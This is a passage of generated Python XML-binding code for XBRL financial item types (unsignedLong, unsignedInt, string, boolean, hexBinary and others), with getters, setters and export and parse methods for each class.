                outfile.write(' %s=%s' % (attr_name_, quote_attrib(attr_value_), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='nonNegativeIntegerItemType', fromsubclass_=False, pretty_print=True):
        # Simple item type: there are no element children to serialize.
        pass
    def build(self, node):
        """Populate this instance from a parsed XML element and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            child_name_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, child_name_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Pull each known attribute off the node, recording it at most once.
        for attr_name_ in ('unitRef', 'decimals', 'id', 'contextRef', 'precision'):
            value = find_attr_value_(attr_name_, node)
            if value is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                setattr(self, attr_name_, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple item type: child elements are ignored.
        pass
# end class nonNegativeIntegerItemType
class unsignedLongItemType(GeneratedsSuper):
    """Generated binding for the XBRL unsignedLongItemType simple item.

    Holds a single text value (valueOf_) plus the standard numeric-item
    attributes: unitRef, decimals, id, contextRef and precision.
    """
    subclass = None
    superclass = None
    def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
        self.original_tagname_ = None
        self.unitRef = _cast(None, unitRef)
        self.decimals = _cast(None, decimals)
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.precision = _cast(None, precision)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed, else this class.
        cls = unsignedLongItemType.subclass or unsignedLongItemType
        return cls(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_unitRef(self):
        return self.unitRef
    def set_unitRef(self, unitRef):
        self.unitRef = unitRef
    def get_decimals(self):
        return self.decimals
    def set_decimals(self, decimals):
        self.decimals = decimals
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_precision(self):
        return self.precision
    def set_precision(self, precision):
        self.precision = precision
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # A simple item has content exactly when its text value is truthy.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='unsignedLongItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (tag, attributes, text value) to outfile."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='unsignedLongItemType')
        if not self.hasContent_():
            # No text value: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        # NOTE(review): encodes to bytes before writing — assumes a
        # byte-oriented outfile (Python-2-era generateDS); confirm on Python 3.
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='unsignedLongItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='unsignedLongItemType'):
        # Emit each known attribute at most once, in schema order.
        for attr_name_, attr_value_ in (
                ('unitRef', self.unitRef),
                ('decimals', self.decimals),
                ('id', self.id),
                ('contextRef', self.contextRef),
                ('precision', self.precision)):
            if attr_value_ is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                outfile.write(' %s=%s' % (attr_name_, quote_attrib(attr_value_), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='unsignedLongItemType', fromsubclass_=False, pretty_print=True):
        # Simple item type: there are no element children to serialize.
        pass
    def build(self, node):
        """Populate this instance from a parsed XML element and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            child_name_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, child_name_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Pull each known attribute off the node, recording it at most once.
        for attr_name_ in ('unitRef', 'decimals', 'id', 'contextRef', 'precision'):
            value = find_attr_value_(attr_name_, node)
            if value is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                setattr(self, attr_name_, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple item type: child elements are ignored.
        pass
# end class unsignedLongItemType
class unsignedIntItemType(GeneratedsSuper):
    """Generated binding for the XBRL unsignedIntItemType simple item.

    Holds a single text value (valueOf_) plus the standard numeric-item
    attributes: unitRef, decimals, id, contextRef and precision.
    """
    subclass = None
    superclass = None
    def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
        self.original_tagname_ = None
        self.unitRef = _cast(None, unitRef)
        self.decimals = _cast(None, decimals)
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.precision = _cast(None, precision)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed, else this class.
        cls = unsignedIntItemType.subclass or unsignedIntItemType
        return cls(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_unitRef(self):
        return self.unitRef
    def set_unitRef(self, unitRef):
        self.unitRef = unitRef
    def get_decimals(self):
        return self.decimals
    def set_decimals(self, decimals):
        self.decimals = decimals
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_precision(self):
        return self.precision
    def set_precision(self, precision):
        self.precision = precision
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # A simple item has content exactly when its text value is truthy.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='unsignedIntItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (tag, attributes, text value) to outfile."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='unsignedIntItemType')
        if not self.hasContent_():
            # No text value: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        # NOTE(review): encodes to bytes before writing — assumes a
        # byte-oriented outfile (Python-2-era generateDS); confirm on Python 3.
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='unsignedIntItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='unsignedIntItemType'):
        # Emit each known attribute at most once, in schema order.
        for attr_name_, attr_value_ in (
                ('unitRef', self.unitRef),
                ('decimals', self.decimals),
                ('id', self.id),
                ('contextRef', self.contextRef),
                ('precision', self.precision)):
            if attr_value_ is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                outfile.write(' %s=%s' % (attr_name_, quote_attrib(attr_value_), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='unsignedIntItemType', fromsubclass_=False, pretty_print=True):
        # Simple item type: there are no element children to serialize.
        pass
    def build(self, node):
        """Populate this instance from a parsed XML element and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            child_name_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, child_name_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Pull each known attribute off the node, recording it at most once.
        for attr_name_ in ('unitRef', 'decimals', 'id', 'contextRef', 'precision'):
            value = find_attr_value_(attr_name_, node)
            if value is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                setattr(self, attr_name_, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple item type: child elements are ignored.
        pass
# end class unsignedIntItemType
class unsignedShortItemType(GeneratedsSuper):
    """Generated binding for the XBRL unsignedShortItemType simple item.

    Holds a single text value (valueOf_) plus the standard numeric-item
    attributes: unitRef, decimals, id, contextRef and precision.
    """
    subclass = None
    superclass = None
    def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
        self.original_tagname_ = None
        self.unitRef = _cast(None, unitRef)
        self.decimals = _cast(None, decimals)
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.precision = _cast(None, precision)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed, else this class.
        cls = unsignedShortItemType.subclass or unsignedShortItemType
        return cls(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_unitRef(self):
        return self.unitRef
    def set_unitRef(self, unitRef):
        self.unitRef = unitRef
    def get_decimals(self):
        return self.decimals
    def set_decimals(self, decimals):
        self.decimals = decimals
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_precision(self):
        return self.precision
    def set_precision(self, precision):
        self.precision = precision
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # A simple item has content exactly when its text value is truthy.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='unsignedShortItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (tag, attributes, text value) to outfile."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='unsignedShortItemType')
        if not self.hasContent_():
            # No text value: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        # NOTE(review): encodes to bytes before writing — assumes a
        # byte-oriented outfile (Python-2-era generateDS); confirm on Python 3.
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='unsignedShortItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='unsignedShortItemType'):
        # Emit each known attribute at most once, in schema order.
        for attr_name_, attr_value_ in (
                ('unitRef', self.unitRef),
                ('decimals', self.decimals),
                ('id', self.id),
                ('contextRef', self.contextRef),
                ('precision', self.precision)):
            if attr_value_ is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                outfile.write(' %s=%s' % (attr_name_, quote_attrib(attr_value_), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='unsignedShortItemType', fromsubclass_=False, pretty_print=True):
        # Simple item type: there are no element children to serialize.
        pass
    def build(self, node):
        """Populate this instance from a parsed XML element and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            child_name_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, child_name_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Pull each known attribute off the node, recording it at most once.
        for attr_name_ in ('unitRef', 'decimals', 'id', 'contextRef', 'precision'):
            value = find_attr_value_(attr_name_, node)
            if value is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                setattr(self, attr_name_, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple item type: child elements are ignored.
        pass
# end class unsignedShortItemType
class unsignedByteItemType(GeneratedsSuper):
    """Generated binding for the XBRL unsignedByteItemType simple item.

    Holds a single text value (valueOf_) plus the standard numeric-item
    attributes: unitRef, decimals, id, contextRef and precision.
    """
    subclass = None
    superclass = None
    def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
        self.original_tagname_ = None
        self.unitRef = _cast(None, unitRef)
        self.decimals = _cast(None, decimals)
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.precision = _cast(None, precision)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed, else this class.
        cls = unsignedByteItemType.subclass or unsignedByteItemType
        return cls(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_unitRef(self):
        return self.unitRef
    def set_unitRef(self, unitRef):
        self.unitRef = unitRef
    def get_decimals(self):
        return self.decimals
    def set_decimals(self, decimals):
        self.decimals = decimals
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_precision(self):
        return self.precision
    def set_precision(self, precision):
        self.precision = precision
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # A simple item has content exactly when its text value is truthy.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='unsignedByteItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (tag, attributes, text value) to outfile."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='unsignedByteItemType')
        if not self.hasContent_():
            # No text value: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        # NOTE(review): encodes to bytes before writing — assumes a
        # byte-oriented outfile (Python-2-era generateDS); confirm on Python 3.
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='unsignedByteItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='unsignedByteItemType'):
        # Emit each known attribute at most once, in schema order.
        for attr_name_, attr_value_ in (
                ('unitRef', self.unitRef),
                ('decimals', self.decimals),
                ('id', self.id),
                ('contextRef', self.contextRef),
                ('precision', self.precision)):
            if attr_value_ is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                outfile.write(' %s=%s' % (attr_name_, quote_attrib(attr_value_), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='unsignedByteItemType', fromsubclass_=False, pretty_print=True):
        # Simple item type: there are no element children to serialize.
        pass
    def build(self, node):
        """Populate this instance from a parsed XML element and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            child_name_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, child_name_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Pull each known attribute off the node, recording it at most once.
        for attr_name_ in ('unitRef', 'decimals', 'id', 'contextRef', 'precision'):
            value = find_attr_value_(attr_name_, node)
            if value is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                setattr(self, attr_name_, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple item type: child elements are ignored.
        pass
# end class unsignedByteItemType
class positiveIntegerItemType(GeneratedsSuper):
    """Generated binding for the XBRL positiveIntegerItemType simple item.

    Holds a single text value (valueOf_) plus the standard numeric-item
    attributes: unitRef, decimals, id, contextRef and precision.
    """
    subclass = None
    superclass = None
    def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
        self.original_tagname_ = None
        self.unitRef = _cast(None, unitRef)
        self.decimals = _cast(None, decimals)
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.precision = _cast(None, precision)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed, else this class.
        cls = positiveIntegerItemType.subclass or positiveIntegerItemType
        return cls(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_unitRef(self):
        return self.unitRef
    def set_unitRef(self, unitRef):
        self.unitRef = unitRef
    def get_decimals(self):
        return self.decimals
    def set_decimals(self, decimals):
        self.decimals = decimals
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_precision(self):
        return self.precision
    def set_precision(self, precision):
        self.precision = precision
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # A simple item has content exactly when its text value is truthy.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='positiveIntegerItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (tag, attributes, text value) to outfile."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='positiveIntegerItemType')
        if not self.hasContent_():
            # No text value: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        # NOTE(review): encodes to bytes before writing — assumes a
        # byte-oriented outfile (Python-2-era generateDS); confirm on Python 3.
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='positiveIntegerItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='positiveIntegerItemType'):
        # Emit each known attribute at most once, in schema order.
        for attr_name_, attr_value_ in (
                ('unitRef', self.unitRef),
                ('decimals', self.decimals),
                ('id', self.id),
                ('contextRef', self.contextRef),
                ('precision', self.precision)):
            if attr_value_ is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                outfile.write(' %s=%s' % (attr_name_, quote_attrib(attr_value_), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='positiveIntegerItemType', fromsubclass_=False, pretty_print=True):
        # Simple item type: there are no element children to serialize.
        pass
    def build(self, node):
        """Populate this instance from a parsed XML element and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            child_name_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, child_name_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Pull each known attribute off the node, recording it at most once.
        for attr_name_ in ('unitRef', 'decimals', 'id', 'contextRef', 'precision'):
            value = find_attr_value_(attr_name_, node)
            if value is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                setattr(self, attr_name_, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple item type: child elements are ignored.
        pass
# end class positiveIntegerItemType
class stringItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``stringItemType`` simple item.

    Holds a text value (``valueOf_``) plus optional ``id`` and
    ``contextRef`` XML attributes.
    """
    subclass = None
    superclass = None
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.valueOf_ = valueOf_
    @staticmethod
    def factory(*args_, **kwargs_):
        # Route construction through a registered subclass when one exists.
        target = stringItemType.subclass or stringItemType
        return target(*args_, **kwargs_)
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Truthy text content marks the element as non-empty.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='stringItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element to *outfile* as XML at indent *level*."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            # Keep the tag name this element was originally parsed under.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='stringItemType')
        if not self.hasContent_():
            # No text content: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='stringItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='stringItemType'):
        # Emit each attribute at most once; already_processed tracks names seen.
        for attr_name, attr_value in (('id', self.id), ('contextRef', self.contextRef)):
            if attr_value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                outfile.write(' %s=%s' % (attr_name, quote_attrib(attr_value)))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='stringItemType', fromsubclass_=False, pretty_print=True):
        # This simple type defines no child elements.
        pass
    def build(self, node):
        """Populate this instance from an ElementTree *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_name = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_name)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Read each known attribute from the node exactly once.
        for attr_name in ('id', 'contextRef'):
            value = find_attr_value_(attr_name, node)
            if value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                setattr(self, attr_name, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # No children to parse for this simple type.
        pass
# end class stringItemType
class booleanItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``booleanItemType`` simple item.

    Holds a text value (``valueOf_``) plus optional ``id`` and
    ``contextRef`` XML attributes.
    """
    subclass = None
    superclass = None
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.valueOf_ = valueOf_
    @staticmethod
    def factory(*args_, **kwargs_):
        # Route construction through a registered subclass when one exists.
        target = booleanItemType.subclass or booleanItemType
        return target(*args_, **kwargs_)
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Truthy text content marks the element as non-empty.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='booleanItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element to *outfile* as XML at indent *level*."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            # Keep the tag name this element was originally parsed under.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='booleanItemType')
        if not self.hasContent_():
            # No text content: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='booleanItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='booleanItemType'):
        # Emit each attribute at most once; already_processed tracks names seen.
        for attr_name, attr_value in (('id', self.id), ('contextRef', self.contextRef)):
            if attr_value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                outfile.write(' %s=%s' % (attr_name, quote_attrib(attr_value)))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='booleanItemType', fromsubclass_=False, pretty_print=True):
        # This simple type defines no child elements.
        pass
    def build(self, node):
        """Populate this instance from an ElementTree *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_name = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_name)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Read each known attribute from the node exactly once.
        for attr_name in ('id', 'contextRef'):
            value = find_attr_value_(attr_name, node)
            if value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                setattr(self, attr_name, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # No children to parse for this simple type.
        pass
# end class booleanItemType
class hexBinaryItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``hexBinaryItemType`` simple item.

    Holds a text value (``valueOf_``) plus optional ``id`` and
    ``contextRef`` XML attributes.
    """
    subclass = None
    superclass = None
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.valueOf_ = valueOf_
    @staticmethod
    def factory(*args_, **kwargs_):
        # Route construction through a registered subclass when one exists.
        target = hexBinaryItemType.subclass or hexBinaryItemType
        return target(*args_, **kwargs_)
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Truthy text content marks the element as non-empty.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='hexBinaryItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element to *outfile* as XML at indent *level*."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            # Keep the tag name this element was originally parsed under.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='hexBinaryItemType')
        if not self.hasContent_():
            # No text content: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='hexBinaryItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='hexBinaryItemType'):
        # Emit each attribute at most once; already_processed tracks names seen.
        for attr_name, attr_value in (('id', self.id), ('contextRef', self.contextRef)):
            if attr_value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                outfile.write(' %s=%s' % (attr_name, quote_attrib(attr_value)))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='hexBinaryItemType', fromsubclass_=False, pretty_print=True):
        # This simple type defines no child elements.
        pass
    def build(self, node):
        """Populate this instance from an ElementTree *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_name = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_name)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Read each known attribute from the node exactly once.
        for attr_name in ('id', 'contextRef'):
            value = find_attr_value_(attr_name, node)
            if value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                setattr(self, attr_name, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # No children to parse for this simple type.
        pass
# end class hexBinaryItemType
class base64BinaryItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``base64BinaryItemType`` simple item.

    Holds a text value (``valueOf_``) plus optional ``id`` and
    ``contextRef`` XML attributes.
    """
    subclass = None
    superclass = None
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.valueOf_ = valueOf_
    @staticmethod
    def factory(*args_, **kwargs_):
        # Route construction through a registered subclass when one exists.
        target = base64BinaryItemType.subclass or base64BinaryItemType
        return target(*args_, **kwargs_)
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_valueOf_(self):
